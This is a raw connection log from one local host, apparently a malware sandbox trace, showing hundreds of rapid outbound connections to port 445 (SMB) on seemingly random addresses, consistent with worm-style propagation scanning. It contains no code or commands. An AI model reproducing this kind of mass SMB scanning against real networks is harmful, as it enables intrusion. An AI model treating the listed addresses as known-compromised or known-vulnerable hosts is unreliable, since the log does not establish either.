May 8, 2023 05:37:25.826322079 CEST	52398	445	192.168.2.6	172.199.166.53
May 8, 2023 05:37:25.826405048 CEST	52399	445	192.168.2.6	178.69.51.237
May 8, 2023 05:37:25.826474905 CEST	52400	445	192.168.2.6	14.231.4.254
May 8, 2023 05:37:25.839252949 CEST	52401	445	192.168.2.6	122.236.204.213
May 8, 2023 05:37:25.870881081 CEST	52417	445	192.168.2.6	24.16.141.102
May 8, 2023 05:37:25.871540070 CEST	52418	445	192.168.2.6	153.131.63.155
May 8, 2023 05:37:25.872003078 CEST	52419	445	192.168.2.6	169.93.155.192
May 8, 2023 05:37:25.872407913 CEST	52420	445	192.168.2.6	148.113.187.216
May 8, 2023 05:37:25.873239994 CEST	52422	445	192.168.2.6	23.240.106.86
May 8, 2023 05:37:25.873671055 CEST	52423	445	192.168.2.6	60.36.7.64
May 8, 2023 05:37:25.873919010 CEST	52421	445	192.168.2.6	195.15.151.36
May 8, 2023 05:37:26.074261904 CEST	80	49700	93.184.221.240	192.168.2.6
May 8, 2023 05:37:26.074486971 CEST	49700	80	192.168.2.6	93.184.221.240
May 8, 2023 05:37:26.777261972 CEST	52426	445	192.168.2.6	107.165.99.68
May 8, 2023 05:37:26.845782042 CEST	52427	445	192.168.2.6	10.51.161.117
May 8, 2023 05:37:26.845858097 CEST	52428	445	192.168.2.6	121.194.70.92
May 8, 2023 05:37:26.845957994 CEST	52429	445	192.168.2.6	161.184.165.31
May 8, 2023 05:37:26.846158981 CEST	52431	445	192.168.2.6	111.185.169.189
May 8, 2023 05:37:26.846266985 CEST	52430	445	192.168.2.6	184.6.189.134
May 8, 2023 05:37:26.846388102 CEST	52432	445	192.168.2.6	210.236.104.52
May 8, 2023 05:37:26.933665991 CEST	52433	445	192.168.2.6	120.12.166.67
May 8, 2023 05:37:26.933780909 CEST	52434	445	192.168.2.6	12.162.239.93
May 8, 2023 05:37:26.934036970 CEST	52436	445	192.168.2.6	6.156.171.224
May 8, 2023 05:37:26.934051991 CEST	52435	445	192.168.2.6	61.118.145.156
May 8, 2023 05:37:26.934247971 CEST	52438	445	192.168.2.6	132.210.0.3
May 8, 2023 05:37:26.934434891 CEST	52439	445	192.168.2.6	62.85.98.131
May 8, 2023 05:37:26.934619904 CEST	52441	445	192.168.2.6	193.140.177.21
May 8, 2023 05:37:26.934746027 CEST	52442	445	192.168.2.6	179.106.20.1
May 8, 2023 05:37:26.934834957 CEST	52443	445	192.168.2.6	66.156.239.119
May 8, 2023 05:37:26.934992075 CEST	52444	445	192.168.2.6	221.49.133.92
May 8, 2023 05:37:26.935209990 CEST	52446	445	192.168.2.6	161.39.234.192
May 8, 2023 05:37:26.935333014 CEST	52447	445	192.168.2.6	33.98.246.21
May 8, 2023 05:37:26.935527086 CEST	52449	445	192.168.2.6	133.163.226.12
May 8, 2023 05:37:26.935676098 CEST	52450	445	192.168.2.6	156.183.90.15
May 8, 2023 05:37:26.935789108 CEST	52451	445	192.168.2.6	10.216.93.233
May 8, 2023 05:37:26.935931921 CEST	52452	445	192.168.2.6	218.197.115.185
May 8, 2023 05:37:26.936060905 CEST	52453	445	192.168.2.6	90.27.19.178
May 8, 2023 05:37:26.951709986 CEST	52458	445	192.168.2.6	199.85.185.62
May 8, 2023 05:37:26.983201027 CEST	52470	445	192.168.2.6	141.23.208.198
May 8, 2023 05:37:26.983432055 CEST	52471	445	192.168.2.6	194.148.74.22
May 8, 2023 05:37:26.983555079 CEST	52472	445	192.168.2.6	101.47.133.34
May 8, 2023 05:37:26.983745098 CEST	52474	445	192.168.2.6	208.69.15.1
May 8, 2023 05:37:26.983726978 CEST	52473	445	192.168.2.6	221.153.101.93
May 8, 2023 05:37:26.983824015 CEST	52475	445	192.168.2.6	65.102.79.24
May 8, 2023 05:37:26.983896017 CEST	52476	445	192.168.2.6	151.9.124.154
May 8, 2023 05:37:27.176217079 CEST	445	52442	179.106.20.1	192.168.2.6
May 8, 2023 05:37:27.684622049 CEST	52442	445	192.168.2.6	179.106.20.1
May 8, 2023 05:37:27.855252028 CEST	52479	445	192.168.2.6	107.165.99.69
May 8, 2023 05:37:27.928489923 CEST	445	52442	179.106.20.1	192.168.2.6
May 8, 2023 05:37:27.950937033 CEST	52480	445	192.168.2.6	111.193.90.189
May 8, 2023 05:37:27.951122999 CEST	52481	445	192.168.2.6	55.199.142.16
May 8, 2023 05:37:27.951287031 CEST	52482	445	192.168.2.6	132.176.232.233
May 8, 2023 05:37:27.951479912 CEST	52483	445	192.168.2.6	197.16.170.165
May 8, 2023 05:37:27.951628923 CEST	52484	445	192.168.2.6	109.19.141.89
May 8, 2023 05:37:27.951798916 CEST	52485	445	192.168.2.6	23.207.19.43
May 8, 2023 05:37:28.058902025 CEST	52486	445	192.168.2.6	146.219.185.252
May 8, 2023 05:37:28.058994055 CEST	52487	445	192.168.2.6	74.89.221.246
May 8, 2023 05:37:28.059354067 CEST	52489	445	192.168.2.6	14.12.240.83
May 8, 2023 05:37:28.059375048 CEST	52488	445	192.168.2.6	88.84.185.86
May 8, 2023 05:37:28.059535980 CEST	52490	445	192.168.2.6	146.181.49.63
May 8, 2023 05:37:28.059674025 CEST	52492	445	192.168.2.6	144.217.1.163
May 8, 2023 05:37:28.059823990 CEST	52495	445	192.168.2.6	211.176.143.34
May 8, 2023 05:37:28.059844971 CEST	52494	445	192.168.2.6	139.196.157.1
May 8, 2023 05:37:28.059958935 CEST	52496	445	192.168.2.6	77.76.253.146
May 8, 2023 05:37:28.060013056 CEST	52497	445	192.168.2.6	31.169.60.182
May 8, 2023 05:37:28.060164928 CEST	52499	445	192.168.2.6	48.85.250.172
May 8, 2023 05:37:28.060203075 CEST	52500	445	192.168.2.6	140.63.66.231
May 8, 2023 05:37:28.060391903 CEST	52503	445	192.168.2.6	90.196.12.228
May 8, 2023 05:37:28.060420036 CEST	52502	445	192.168.2.6	212.96.20.232
May 8, 2023 05:37:28.060516119 CEST	52504	445	192.168.2.6	71.98.193.233
May 8, 2023 05:37:28.060621977 CEST	52505	445	192.168.2.6	119.30.29.205
May 8, 2023 05:37:28.060648918 CEST	52506	445	192.168.2.6	120.93.205.5
May 8, 2023 05:37:28.074423075 CEST	52518	445	192.168.2.6	7.245.56.20
May 8, 2023 05:37:28.121294975 CEST	52523	445	192.168.2.6	29.135.235.201
May 8, 2023 05:37:28.122009993 CEST	52524	445	192.168.2.6	123.146.221.242
May 8, 2023 05:37:28.122699976 CEST	52525	445	192.168.2.6	55.49.153.104
May 8, 2023 05:37:28.123459101 CEST	52526	445	192.168.2.6	41.145.123.51
May 8, 2023 05:37:28.124070883 CEST	52527	445	192.168.2.6	78.194.132.153
May 8, 2023 05:37:28.124716997 CEST	52528	445	192.168.2.6	150.227.217.22
May 8, 2023 05:37:28.125421047 CEST	52529	445	192.168.2.6	47.167.166.108
May 8, 2023 05:37:28.161979914 CEST	445	52492	144.217.1.163	192.168.2.6
May 8, 2023 05:37:28.271280050 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:37:28.271337986 CEST	443	49699	23.0.174.90	192.168.2.6
May 8, 2023 05:37:28.271454096 CEST	49699	443	192.168.2.6	23.0.174.90
May 8, 2023 05:37:28.667371035 CEST	52492	445	192.168.2.6	144.217.1.163
May 8, 2023 05:37:28.769721031 CEST	445	52492	144.217.1.163	192.168.2.6
May 8, 2023 05:37:28.933197975 CEST	52533	445	192.168.2.6	107.165.99.70
May 8, 2023 05:37:29.075136900 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:29.075143099 CEST	52535	445	192.168.2.6	134.61.87.123
May 8, 2023 05:37:29.075345039 CEST	52536	445	192.168.2.6	112.160.78.240
May 8, 2023 05:37:29.075413942 CEST	52537	445	192.168.2.6	96.77.70.191
May 8, 2023 05:37:29.075578928 CEST	52538	445	192.168.2.6	40.26.199.169
May 8, 2023 05:37:29.075669050 CEST	52539	445	192.168.2.6	43.68.71.129
May 8, 2023 05:37:29.184309006 CEST	52552	445	192.168.2.6	69.19.219.126
May 8, 2023 05:37:29.184812069 CEST	52556	445	192.168.2.6	155.204.3.21
May 8, 2023 05:37:29.185072899 CEST	52557	445	192.168.2.6	101.75.58.17
May 8, 2023 05:37:29.185225010 CEST	52558	445	192.168.2.6	22.46.6.37
May 8, 2023 05:37:29.185456991 CEST	52559	445	192.168.2.6	107.124.141.93
May 8, 2023 05:37:29.185614109 CEST	52560	445	192.168.2.6	61.14.159.213
May 8, 2023 05:37:29.185941935 CEST	52562	445	192.168.2.6	153.103.201.203
May 8, 2023 05:37:29.186213017 CEST	52564	445	192.168.2.6	96.71.60.88
May 8, 2023 05:37:29.186458111 CEST	52565	445	192.168.2.6	121.212.170.222
May 8, 2023 05:37:29.186589003 CEST	52566	445	192.168.2.6	99.53.38.244
May 8, 2023 05:37:29.186836004 CEST	52567	445	192.168.2.6	153.1.63.82
May 8, 2023 05:37:29.187038898 CEST	52569	445	192.168.2.6	34.169.35.224
May 8, 2023 05:37:29.187293053 CEST	52570	445	192.168.2.6	190.41.122.220
May 8, 2023 05:37:29.187405109 CEST	52572	445	192.168.2.6	48.121.133.172
May 8, 2023 05:37:29.187495947 CEST	52573	445	192.168.2.6	36.63.115.174
May 8, 2023 05:37:29.187622070 CEST	52574	445	192.168.2.6	94.157.208.22
May 8, 2023 05:37:29.187777042 CEST	52576	445	192.168.2.6	173.190.64.76
May 8, 2023 05:37:29.187879086 CEST	52575	445	192.168.2.6	189.172.70.38
May 8, 2023 05:37:29.231009007 CEST	52577	445	192.168.2.6	182.79.62.231
May 8, 2023 05:37:29.231489897 CEST	52578	445	192.168.2.6	67.174.126.93
May 8, 2023 05:37:29.231941938 CEST	52579	445	192.168.2.6	155.203.215.230
May 8, 2023 05:37:29.232428074 CEST	52580	445	192.168.2.6	149.72.233.38
May 8, 2023 05:37:29.232848883 CEST	52581	445	192.168.2.6	119.75.177.2
May 8, 2023 05:37:29.233232975 CEST	52582	445	192.168.2.6	13.65.58.134
May 8, 2023 05:37:29.233638048 CEST	52583	445	192.168.2.6	65.101.157.62
May 8, 2023 05:37:29.262346983 CEST	445	52534	137.132.36.25	192.168.2.6
May 8, 2023 05:37:29.264851093 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:29.323127985 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:29.518810034 CEST	445	52584	137.132.36.1	192.168.2.6
May 8, 2023 05:37:29.518949986 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:29.519514084 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:29.708210945 CEST	445	52586	137.132.36.1	192.168.2.6
May 8, 2023 05:37:29.710906029 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:29.886202097 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:29.996314049 CEST	52589	445	192.168.2.6	107.165.99.71
May 8, 2023 05:37:30.089382887 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:30.184305906 CEST	52591	445	192.168.2.6	213.89.85.94
May 8, 2023 05:37:30.184369087 CEST	52590	445	192.168.2.6	57.65.34.150
May 8, 2023 05:37:30.184508085 CEST	52592	445	192.168.2.6	191.151.251.77
May 8, 2023 05:37:30.184623003 CEST	52593	445	192.168.2.6	86.80.209.172
May 8, 2023 05:37:30.184672117 CEST	52594	445	192.168.2.6	145.185.181.249
May 8, 2023 05:37:30.293884993 CEST	52608	445	192.168.2.6	177.59.13.77
May 8, 2023 05:37:30.294305086 CEST	52612	445	192.168.2.6	137.22.135.146
May 8, 2023 05:37:30.294579983 CEST	52613	445	192.168.2.6	77.205.129.181
May 8, 2023 05:37:30.294629097 CEST	52614	445	192.168.2.6	209.250.64.170
May 8, 2023 05:37:30.294910908 CEST	52615	445	192.168.2.6	156.21.38.231
May 8, 2023 05:37:30.295057058 CEST	52616	445	192.168.2.6	157.197.254.203
May 8, 2023 05:37:30.295203924 CEST	52617	445	192.168.2.6	111.252.127.38
May 8, 2023 05:37:30.295439005 CEST	52620	445	192.168.2.6	13.188.43.194
May 8, 2023 05:37:30.295593023 CEST	52622	445	192.168.2.6	3.236.56.216
May 8, 2023 05:37:30.295702934 CEST	52621	445	192.168.2.6	64.45.56.112
May 8, 2023 05:37:30.295717001 CEST	52623	445	192.168.2.6	132.0.185.235
May 8, 2023 05:37:30.295923948 CEST	52625	445	192.168.2.6	23.14.47.159
May 8, 2023 05:37:30.296113968 CEST	52627	445	192.168.2.6	117.182.155.194
May 8, 2023 05:37:30.296313047 CEST	52628	445	192.168.2.6	156.182.136.39
May 8, 2023 05:37:30.296468973 CEST	52629	445	192.168.2.6	60.151.167.121
May 8, 2023 05:37:30.296480894 CEST	52630	445	192.168.2.6	157.84.14.230
May 8, 2023 05:37:30.296647072 CEST	52631	445	192.168.2.6	211.207.39.252
May 8, 2023 05:37:30.296837091 CEST	52632	445	192.168.2.6	12.191.17.71
May 8, 2023 05:37:30.308118105 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:30.370651960 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:30.379780054 CEST	52633	445	192.168.2.6	178.71.151.229
May 8, 2023 05:37:30.381917000 CEST	52634	445	192.168.2.6	158.206.83.103
May 8, 2023 05:37:30.382427931 CEST	52635	445	192.168.2.6	155.153.201.246
May 8, 2023 05:37:30.382445097 CEST	52636	445	192.168.2.6	162.207.243.79
May 8, 2023 05:37:30.382525921 CEST	52637	445	192.168.2.6	200.58.208.72
May 8, 2023 05:37:30.382577896 CEST	52638	445	192.168.2.6	114.121.171.53
May 8, 2023 05:37:30.382606983 CEST	52639	445	192.168.2.6	144.77.107.96
May 8, 2023 05:37:30.589530945 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:30.808250904 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:31.074346066 CEST	52643	445	192.168.2.6	107.165.99.72
May 8, 2023 05:37:31.310081959 CEST	52644	445	192.168.2.6	129.39.241.226
May 8, 2023 05:37:31.310240030 CEST	52645	445	192.168.2.6	222.31.218.49
May 8, 2023 05:37:31.310457945 CEST	52646	445	192.168.2.6	94.217.117.56
May 8, 2023 05:37:31.310595036 CEST	52647	445	192.168.2.6	7.172.168.109
May 8, 2023 05:37:31.310801029 CEST	52648	445	192.168.2.6	194.172.241.232
May 8, 2023 05:37:31.418747902 CEST	52663	445	192.168.2.6	147.104.45.231
May 8, 2023 05:37:31.418945074 CEST	52666	445	192.168.2.6	102.161.202.88
May 8, 2023 05:37:31.419128895 CEST	52667	445	192.168.2.6	58.116.88.250
May 8, 2023 05:37:31.419316053 CEST	52668	445	192.168.2.6	25.79.100.212
May 8, 2023 05:37:31.419430971 CEST	52669	445	192.168.2.6	47.190.111.248
May 8, 2023 05:37:31.419580936 CEST	52671	445	192.168.2.6	204.175.253.49
May 8, 2023 05:37:31.419646978 CEST	52670	445	192.168.2.6	139.223.24.244
May 8, 2023 05:37:31.419956923 CEST	52673	445	192.168.2.6	95.210.170.46
May 8, 2023 05:37:31.420274019 CEST	52676	445	192.168.2.6	116.37.206.159
May 8, 2023 05:37:31.420393944 CEST	52675	445	192.168.2.6	73.208.235.81
May 8, 2023 05:37:31.420523882 CEST	52677	445	192.168.2.6	117.217.175.126
May 8, 2023 05:37:31.420747995 CEST	52679	445	192.168.2.6	113.168.253.154
May 8, 2023 05:37:31.421036959 CEST	52681	445	192.168.2.6	202.115.239.133
May 8, 2023 05:37:31.421117067 CEST	52682	445	192.168.2.6	2.161.45.128
May 8, 2023 05:37:31.421288967 CEST	52683	445	192.168.2.6	181.248.65.75
May 8, 2023 05:37:31.421396971 CEST	52684	445	192.168.2.6	184.108.103.175
May 8, 2023 05:37:31.421524048 CEST	52685	445	192.168.2.6	43.157.40.184
May 8, 2023 05:37:31.421648979 CEST	52686	445	192.168.2.6	75.96.83.160
May 8, 2023 05:37:31.481586933 CEST	52687	445	192.168.2.6	212.122.164.79
May 8, 2023 05:37:31.482481956 CEST	52688	445	192.168.2.6	15.160.3.217
May 8, 2023 05:37:31.483508110 CEST	52689	445	192.168.2.6	160.159.10.54
May 8, 2023 05:37:31.484617949 CEST	52690	445	192.168.2.6	86.133.153.151
May 8, 2023 05:37:31.486860037 CEST	52691	445	192.168.2.6	219.228.55.162
May 8, 2023 05:37:31.494837999 CEST	52692	445	192.168.2.6	148.198.245.188
May 8, 2023 05:37:31.495357990 CEST	52693	445	192.168.2.6	41.96.161.137
May 8, 2023 05:37:31.495726109 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:31.745742083 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:31.980474949 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:32.136859894 CEST	52697	445	192.168.2.6	107.165.99.73
May 8, 2023 05:37:32.435164928 CEST	52699	445	192.168.2.6	39.182.165.148
May 8, 2023 05:37:32.435520887 CEST	52700	445	192.168.2.6	96.191.110.46
May 8, 2023 05:37:32.435693979 CEST	52701	445	192.168.2.6	59.52.29.116
May 8, 2023 05:37:32.435910940 CEST	52702	445	192.168.2.6	93.66.32.217
May 8, 2023 05:37:32.436177015 CEST	52703	445	192.168.2.6	43.27.136.11
May 8, 2023 05:37:32.546276093 CEST	52718	445	192.168.2.6	73.183.23.163
May 8, 2023 05:37:32.546616077 CEST	52721	445	192.168.2.6	72.98.33.6
May 8, 2023 05:37:32.546838999 CEST	52722	445	192.168.2.6	175.243.250.0
May 8, 2023 05:37:32.547080994 CEST	52723	445	192.168.2.6	194.59.21.216
May 8, 2023 05:37:32.547297001 CEST	52724	445	192.168.2.6	161.224.91.102
May 8, 2023 05:37:32.547508955 CEST	52725	445	192.168.2.6	141.121.215.124
May 8, 2023 05:37:32.547908068 CEST	52727	445	192.168.2.6	69.208.38.128
May 8, 2023 05:37:32.548091888 CEST	52728	445	192.168.2.6	64.10.239.113
May 8, 2023 05:37:32.548453093 CEST	52730	445	192.168.2.6	189.19.74.40
May 8, 2023 05:37:32.548616886 CEST	52731	445	192.168.2.6	183.85.65.219
May 8, 2023 05:37:32.548773050 CEST	52732	445	192.168.2.6	112.234.250.16
May 8, 2023 05:37:32.549179077 CEST	52734	445	192.168.2.6	107.30.232.40
May 8, 2023 05:37:32.549479008 CEST	52736	445	192.168.2.6	196.95.50.161
May 8, 2023 05:37:32.549652100 CEST	52737	445	192.168.2.6	121.213.170.28
May 8, 2023 05:37:32.549940109 CEST	52738	445	192.168.2.6	27.148.4.88
May 8, 2023 05:37:32.550043106 CEST	52739	445	192.168.2.6	111.215.207.33
May 8, 2023 05:37:32.550273895 CEST	52740	445	192.168.2.6	140.168.218.2
May 8, 2023 05:37:32.550432920 CEST	52741	445	192.168.2.6	115.243.111.241
May 8, 2023 05:37:32.621817112 CEST	52742	445	192.168.2.6	20.135.237.145
May 8, 2023 05:37:32.622886896 CEST	52743	445	192.168.2.6	34.16.182.243
May 8, 2023 05:37:32.623960018 CEST	52744	445	192.168.2.6	24.200.78.13
May 8, 2023 05:37:32.626667023 CEST	52745	445	192.168.2.6	103.21.101.46
May 8, 2023 05:37:32.627376080 CEST	52746	445	192.168.2.6	47.225.54.8
May 8, 2023 05:37:32.627511978 CEST	52747	445	192.168.2.6	147.68.254.42
May 8, 2023 05:37:32.627651930 CEST	52748	445	192.168.2.6	172.6.245.94
May 8, 2023 05:37:33.199584007 CEST	52752	445	192.168.2.6	107.165.99.74
May 8, 2023 05:37:33.494144917 CEST	445	52736	196.95.50.161	192.168.2.6
May 8, 2023 05:37:33.544648886 CEST	52754	445	192.168.2.6	214.55.205.124
May 8, 2023 05:37:33.544909954 CEST	52755	445	192.168.2.6	1.227.17.132
May 8, 2023 05:37:33.545279026 CEST	52756	445	192.168.2.6	64.155.129.128
May 8, 2023 05:37:33.545433998 CEST	52757	445	192.168.2.6	190.186.147.75
May 8, 2023 05:37:33.545758009 CEST	52758	445	192.168.2.6	75.180.195.120
May 8, 2023 05:37:33.662265062 CEST	52773	445	192.168.2.6	180.158.49.7
May 8, 2023 05:37:33.662594080 CEST	52776	445	192.168.2.6	185.229.152.8
May 8, 2023 05:37:33.663007975 CEST	52778	445	192.168.2.6	209.83.99.95
May 8, 2023 05:37:33.663007975 CEST	52777	445	192.168.2.6	216.128.165.105
May 8, 2023 05:37:33.663258076 CEST	52779	445	192.168.2.6	105.205.230.165
May 8, 2023 05:37:33.663383007 CEST	52780	445	192.168.2.6	150.98.36.96
May 8, 2023 05:37:33.663779020 CEST	52782	445	192.168.2.6	147.125.226.43
May 8, 2023 05:37:33.664074898 CEST	52783	445	192.168.2.6	207.152.160.153
May 8, 2023 05:37:33.664865017 CEST	52785	445	192.168.2.6	164.117.208.138
May 8, 2023 05:37:33.665024996 CEST	52786	445	192.168.2.6	8.148.140.42
May 8, 2023 05:37:33.665237904 CEST	52788	445	192.168.2.6	49.73.57.173
May 8, 2023 05:37:33.665293932 CEST	52789	445	192.168.2.6	52.228.88.180
May 8, 2023 05:37:33.665551901 CEST	52791	445	192.168.2.6	90.82.244.158
May 8, 2023 05:37:33.665579081 CEST	52792	445	192.168.2.6	18.131.109.211
May 8, 2023 05:37:33.665781975 CEST	52793	445	192.168.2.6	173.98.105.249
May 8, 2023 05:37:33.665858984 CEST	52794	445	192.168.2.6	74.58.159.25
May 8, 2023 05:37:33.665947914 CEST	52795	445	192.168.2.6	164.241.197.190
May 8, 2023 05:37:33.666059017 CEST	52796	445	192.168.2.6	9.152.201.179
May 8, 2023 05:37:33.745907068 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:33.747071028 CEST	52797	445	192.168.2.6	118.117.20.111
May 8, 2023 05:37:33.747631073 CEST	52798	445	192.168.2.6	198.87.154.251
May 8, 2023 05:37:33.748457909 CEST	52799	445	192.168.2.6	48.244.69.234
May 8, 2023 05:37:33.750977993 CEST	52800	445	192.168.2.6	6.28.147.122
May 8, 2023 05:37:33.751254082 CEST	52801	445	192.168.2.6	205.134.10.128
May 8, 2023 05:37:33.751368046 CEST	52802	445	192.168.2.6	178.231.151.30
May 8, 2023 05:37:33.751450062 CEST	52803	445	192.168.2.6	43.252.40.54
May 8, 2023 05:37:34.058631897 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:34.277704000 CEST	52808	445	192.168.2.6	107.165.99.75
May 8, 2023 05:37:34.330617905 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:34.653337955 CEST	52810	445	192.168.2.6	122.174.150.3
May 8, 2023 05:37:34.653503895 CEST	52811	445	192.168.2.6	90.156.95.19
May 8, 2023 05:37:34.653589964 CEST	52812	445	192.168.2.6	10.188.109.87
May 8, 2023 05:37:34.653681993 CEST	52813	445	192.168.2.6	17.231.78.158
May 8, 2023 05:37:34.653774023 CEST	52814	445	192.168.2.6	74.200.27.92
May 8, 2023 05:37:34.772665977 CEST	52828	445	192.168.2.6	174.71.253.157
May 8, 2023 05:37:34.772963047 CEST	52832	445	192.168.2.6	35.108.129.56
May 8, 2023 05:37:34.773041010 CEST	52833	445	192.168.2.6	92.75.252.27
May 8, 2023 05:37:34.773214102 CEST	52834	445	192.168.2.6	168.93.223.130
May 8, 2023 05:37:34.773215055 CEST	52835	445	192.168.2.6	129.206.195.146
May 8, 2023 05:37:34.773359060 CEST	52837	445	192.168.2.6	82.52.166.152
May 8, 2023 05:37:34.773521900 CEST	52838	445	192.168.2.6	183.94.109.214
May 8, 2023 05:37:34.773610115 CEST	52839	445	192.168.2.6	74.51.217.160
May 8, 2023 05:37:34.773701906 CEST	52840	445	192.168.2.6	192.48.148.198
May 8, 2023 05:37:34.773855925 CEST	52842	445	192.168.2.6	218.235.8.12
May 8, 2023 05:37:34.773953915 CEST	52843	445	192.168.2.6	212.176.18.91
May 8, 2023 05:37:34.774125099 CEST	52845	445	192.168.2.6	140.38.134.155
May 8, 2023 05:37:34.774303913 CEST	52847	445	192.168.2.6	139.23.145.81
May 8, 2023 05:37:34.774399996 CEST	52848	445	192.168.2.6	109.8.173.242
May 8, 2023 05:37:34.774632931 CEST	52850	445	192.168.2.6	176.222.96.181
May 8, 2023 05:37:34.774637938 CEST	52849	445	192.168.2.6	22.107.157.162
May 8, 2023 05:37:34.774710894 CEST	52851	445	192.168.2.6	107.119.151.216
May 8, 2023 05:37:34.774848938 CEST	52852	445	192.168.2.6	166.17.193.131
May 8, 2023 05:37:34.873032093 CEST	52853	445	192.168.2.6	100.86.121.115
May 8, 2023 05:37:34.873106956 CEST	52854	445	192.168.2.6	209.194.112.177
May 8, 2023 05:37:34.873147964 CEST	52855	445	192.168.2.6	140.185.125.174
May 8, 2023 05:37:34.873194933 CEST	52856	445	192.168.2.6	178.41.0.224
May 8, 2023 05:37:34.873301029 CEST	52857	445	192.168.2.6	197.222.211.220
May 8, 2023 05:37:34.873387098 CEST	52858	445	192.168.2.6	143.82.234.132
May 8, 2023 05:37:34.887228966 CEST	52859	445	192.168.2.6	174.203.241.252
May 8, 2023 05:37:35.340342999 CEST	52862	445	192.168.2.6	107.165.99.76
May 8, 2023 05:37:35.761913061 CEST	52866	445	192.168.2.6	192.206.81.252
May 8, 2023 05:37:35.761954069 CEST	52867	445	192.168.2.6	161.70.185.17
May 8, 2023 05:37:35.762094975 CEST	52868	445	192.168.2.6	206.209.16.8
May 8, 2023 05:37:35.762269020 CEST	52869	445	192.168.2.6	131.224.11.119
May 8, 2023 05:37:35.762388945 CEST	52870	445	192.168.2.6	5.214.146.248
May 8, 2023 05:37:35.887996912 CEST	52872	445	192.168.2.6	62.25.113.248
May 8, 2023 05:37:35.888014078 CEST	52873	445	192.168.2.6	163.118.137.227
May 8, 2023 05:37:35.888339043 CEST	52874	445	192.168.2.6	23.17.157.49
May 8, 2023 05:37:35.888819933 CEST	52875	445	192.168.2.6	55.101.65.250
May 8, 2023 05:37:35.889190912 CEST	52876	445	192.168.2.6	208.215.208.151
May 8, 2023 05:37:35.889564037 CEST	52877	445	192.168.2.6	24.14.13.42
May 8, 2023 05:37:35.890285969 CEST	52879	445	192.168.2.6	170.3.102.39
May 8, 2023 05:37:35.891194105 CEST	52881	445	192.168.2.6	45.240.104.66
May 8, 2023 05:37:35.891581059 CEST	52883	445	192.168.2.6	35.69.67.60
May 8, 2023 05:37:35.891725063 CEST	52884	445	192.168.2.6	117.129.83.128
May 8, 2023 05:37:35.891865015 CEST	52885	445	192.168.2.6	104.86.196.43
May 8, 2023 05:37:35.892148972 CEST	52886	445	192.168.2.6	76.220.78.84
May 8, 2023 05:37:35.892283916 CEST	52887	445	192.168.2.6	220.168.159.186
May 8, 2023 05:37:35.892492056 CEST	52889	445	192.168.2.6	141.112.37.24
May 8, 2023 05:37:35.892606020 CEST	52890	445	192.168.2.6	162.104.38.173
May 8, 2023 05:37:35.892863989 CEST	52891	445	192.168.2.6	100.197.94.165
May 8, 2023 05:37:35.892956018 CEST	52892	445	192.168.2.6	170.162.216.236
May 8, 2023 05:37:35.893497944 CEST	52896	445	192.168.2.6	50.224.240.223
May 8, 2023 05:37:35.982999086 CEST	52909	445	192.168.2.6	130.89.144.118
May 8, 2023 05:37:35.983035088 CEST	52910	445	192.168.2.6	46.43.244.112
May 8, 2023 05:37:35.983098984 CEST	52911	445	192.168.2.6	158.184.44.117
May 8, 2023 05:37:35.983163118 CEST	52913	445	192.168.2.6	208.232.23.57
May 8, 2023 05:37:35.983261108 CEST	52912	445	192.168.2.6	65.96.100.144
May 8, 2023 05:37:35.983262062 CEST	52914	445	192.168.2.6	47.177.183.43
May 8, 2023 05:37:35.996855021 CEST	52915	445	192.168.2.6	61.185.80.42
May 8, 2023 05:37:36.418499947 CEST	52919	445	192.168.2.6	107.165.99.77
May 8, 2023 05:37:36.887295961 CEST	52924	445	192.168.2.6	123.0.120.206
May 8, 2023 05:37:36.887480021 CEST	52925	445	192.168.2.6	62.78.149.220
May 8, 2023 05:37:36.887485981 CEST	52923	445	192.168.2.6	119.108.22.25
May 8, 2023 05:37:36.887589931 CEST	52926	445	192.168.2.6	40.167.245.99
May 8, 2023 05:37:36.887712955 CEST	52927	445	192.168.2.6	66.59.242.114
May 8, 2023 05:37:37.013302088 CEST	52941	445	192.168.2.6	7.196.78.244
May 8, 2023 05:37:37.013608932 CEST	52945	445	192.168.2.6	19.214.79.189
May 8, 2023 05:37:37.013806105 CEST	52946	445	192.168.2.6	176.129.64.54
May 8, 2023 05:37:37.013936996 CEST	52947	445	192.168.2.6	91.43.83.114
May 8, 2023 05:37:37.014132977 CEST	52948	445	192.168.2.6	18.52.180.203
May 8, 2023 05:37:37.014256001 CEST	52949	445	192.168.2.6	99.24.98.169
May 8, 2023 05:37:37.014580011 CEST	52951	445	192.168.2.6	106.199.254.145
May 8, 2023 05:37:37.014727116 CEST	52952	445	192.168.2.6	172.164.142.113
May 8, 2023 05:37:37.014895916 CEST	52953	445	192.168.2.6	33.231.229.61
May 8, 2023 05:37:37.015050888 CEST	52954	445	192.168.2.6	67.205.17.184
May 8, 2023 05:37:37.015420914 CEST	52956	445	192.168.2.6	92.36.165.112
May 8, 2023 05:37:37.015676975 CEST	52958	445	192.168.2.6	97.198.171.228
May 8, 2023 05:37:37.016063929 CEST	52960	445	192.168.2.6	171.28.22.72
May 8, 2023 05:37:37.016226053 CEST	52961	445	192.168.2.6	218.63.194.191
May 8, 2023 05:37:37.016419888 CEST	52962	445	192.168.2.6	117.138.56.21
May 8, 2023 05:37:37.016621113 CEST	52963	445	192.168.2.6	51.144.42.205
May 8, 2023 05:37:37.016787052 CEST	52964	445	192.168.2.6	26.72.238.254
